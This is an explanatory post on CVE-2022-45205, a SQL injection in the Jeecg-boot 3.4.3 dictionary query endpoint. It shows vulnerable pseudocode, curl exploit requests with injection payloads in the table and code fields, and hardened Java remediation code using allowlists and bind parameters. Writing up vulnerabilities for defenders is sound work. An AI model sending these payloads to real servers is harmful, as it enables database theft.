Jeecg-boot is a popular low-code platform for rapid business application development in Java. Unfortunately, version 3.4.3 contains a serious security flaw: CVE-2022-45205, a SQL injection vulnerability in the /sys/dict/queryTableData endpoint. This post breaks down the vulnerability in plain language, shows code snippets, and gives insights and resources for further learning—including how attackers might exploit it.
What is CVE-2022-45205?
CVE-2022-45205 is an identifier for a security flaw found in Jeecg-boot v3.4.3. The vulnerability allows remote attackers to inject malicious SQL commands by manipulating inputs sent to the /sys/dict/queryTableData API. Essentially, an attacker could steal or destroy data from your database with a crafted request.
Official Reference:
- NVD - CVE-2022-45205
Where’s the Problem? Vulnerable Endpoint Explained
The /sys/dict/queryTableData endpoint lets the frontend fetch dictionary data from a database table, for example to populate dropdown menus. The issue lies in how it processes the request parameters, especially table, code and text: they are concatenated directly into a SQL query without any validation or sanitization.
Example vulnerable request
POST /jeecg-boot/sys/dict/queryTableData
Content-Type: application/json
{
"table": "users",
"text": "username",
"code": "id",
"key": "",
"pid": "",
"condition": ""
}
A bad actor can change these values to inject SQL payloads.
Vulnerable Code Snippet (Simplified)
This is not the actual Jeecg-boot source, but here is simplified Java-style pseudocode to help you see where the mistake happens:
// Pseudocode illustrating the flaw (not the actual Jeecg-boot source).
// Assumes a Spring JdbcTemplate instance named jdbcTemplate is available.
String table = request.getParameter("table");
String text = request.getParameter("text");
String code = request.getParameter("code");
// Table and column names are concatenated straight into the query: there is
// no validation, and identifiers cannot be passed as bind parameters.
String sql = "SELECT " + code + ", " + text + " FROM " + table;
List<Map<String, Object>> results = jdbcTemplate.queryForList(sql);
Problem:
The code inserts untrusted user-supplied input directly into the SQL query string. If the attacker controls the table, text, or code fields, they can run arbitrary SQL.
How Does the Exploit Work?
An attacker sends a POST request to /sys/dict/queryTableData with malicious SQL in the table, text, or code parameters. The walkthrough below uses curl.
Step 1: The Payload
Suppose the attacker wants to leak user information. They set the code parameter to
id FROM users;--
Step 2: The Exploit Request
curl -X POST http://target-server/jeecg-boot/sys/dict/queryTableData \
-H "Content-Type: application/json" \
-d '{
"table": "users",
"text": "username",
"code": "id from users;-- ",
"key": "",
"pid": "",
"condition": ""
}'
The resulting SQL is
SELECT id FROM users;-- , username FROM users
The -- starts a SQL comment, so everything after it is ignored; whether the statement runs exactly as shown depends on how the backend executes queries. Either way, the attacker now controls the query, which can lead to data leakage.
Dumping entire tables
curl -X POST http://target-server/jeecg-boot/sys/dict/queryTableData \
-H "Content-Type: application/json" \
-d '{
"table": "users WHERE 1=1;-- ",
"text": "username",
"code": "id",
"key": "",
"pid": "",
"condition": ""
}'
Here, the attacker modifies the table name, potentially adding any SQL logic.
Remediation
Update Jeecg-boot!
- According to the Jeecg-boot GitHub repository, this issue is patched in later versions (v3.4.4+).
Sanitize Input:
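An added example of the hardened form for this point (illustrative code written for this post, not Jeecg-boot's own fix; it assumes a Spring JdbcTemplate handler like the pseudocode above and an allowlist of dictionary tables, here named ALLOWED_TABLES with assumed table names): table and column names cannot be sent as bind parameters, so they are checked against a strict identifier pattern and an explicit allowlist before the query is built, while the lookup value is always bound as a parameter.

```java
import java.util.List;
import java.util.Map;
import java.util.Set;
import java.util.regex.Pattern;
import org.springframework.jdbc.core.JdbcTemplate;

// Hardened version of the dictionary lookup (illustrative, not the Jeecg-boot source).
public class SafeDictTableQuery {
    // SQL identifiers cannot be bound with "?", so restrict them to a strict shape...
    private static final Pattern IDENT = Pattern.compile("^[A-Za-z_][A-Za-z0-9_]{0,63}$");
    // ...and to an explicit allowlist (assumed names; use the tables your dictionaries live in).
    private static final Set<String> ALLOWED_TABLES = Set.of("sys_dict_item", "sys_category");

    private final JdbcTemplate jdbcTemplate;

    public SafeDictTableQuery(JdbcTemplate jdbcTemplate) {
        this.jdbcTemplate = jdbcTemplate;
    }

    // Rejects anything that is not a plain identifier: spaces, quotes, ';' and '--' all fail,
    // so inputs such as "id FROM users;-- " or "users WHERE 1=1;-- " never reach the query.
    static String requireIdentifier(String value, String what) {
        if (value == null || !IDENT.matcher(value).matches()) {
            throw new IllegalArgumentException("invalid " + what + " name");
        }
        return value;
    }

    public List<Map<String, Object>> queryTableData(String table, String text, String code, String key) {
        requireIdentifier(table, "table");
        requireIdentifier(text, "text column");
        requireIdentifier(code, "code column");
        if (!ALLOWED_TABLES.contains(table.toLowerCase())) {
            throw new IllegalArgumentException("table not permitted for dictionary lookup");
        }
        // Identifiers are validated, so interpolating them is now safe; the lookup value
        // ("key" in the request) is data and is always passed as a bind parameter.
        String sql = "SELECT " + code + " AS value, " + text + " AS label FROM " + table;
        if (key != null && !key.isEmpty()) {
            return jdbcTemplate.queryForList(sql + " WHERE " + code + " = ?", key);
        }
        return jdbcTemplate.queryForList(sql);
    }
}
```

The request's free-form condition field is deliberately not accepted in this version: an arbitrary WHERE fragment cannot be made safe by escaping, so any filtering should be expressed as bound values against known columns.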
References & Learn More
- NVD - CVE-2022-45205
- Jeecg-boot Project on GitHub
- OWASP SQL Injection Cheat Sheet
Summary
CVE-2022-45205 is an easily exploitable SQL injection in Jeecg-boot 3.4.3 and possibly earlier. If you’re running this version, update immediately and audit any custom endpoints for similar issues. Always validate and sanitize your input; SQL injection is a classic problem with devastating consequences.
Stay safe and patch early!
(For educational purposes only. Never test vulnerabilities on anything you do not own or have permission to test.)
Timeline
Published on: 11/25/2022 17:15:00 UTC
Last modified on: 11/28/2022 19:42:00 UTC